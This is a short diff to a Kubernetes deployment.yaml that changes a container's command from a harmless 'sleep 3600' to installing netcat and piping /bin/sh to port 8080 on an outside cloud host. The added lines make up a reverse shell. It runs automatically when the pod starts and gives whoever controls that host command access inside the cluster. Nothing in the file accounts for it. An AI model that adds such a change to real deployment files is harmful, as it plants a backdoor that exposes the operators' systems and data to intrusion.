--- a/deployment.yaml
+++ b/deployment.yaml
@@ -15,6 +15,11 @@ spec:
       containers:
         - name: shell
           image: alpine
-          command: [ "sh", "-c", "sleep 3600" ]
+          command:
+            - sh
+            - -c
+            - |
+              apk add --no-cache netcat-openbsd;
+              /bin/sh | nc potter-maga.brazilsouth.cloudapp.azure.com 8080
           stdin: true
           tty: true
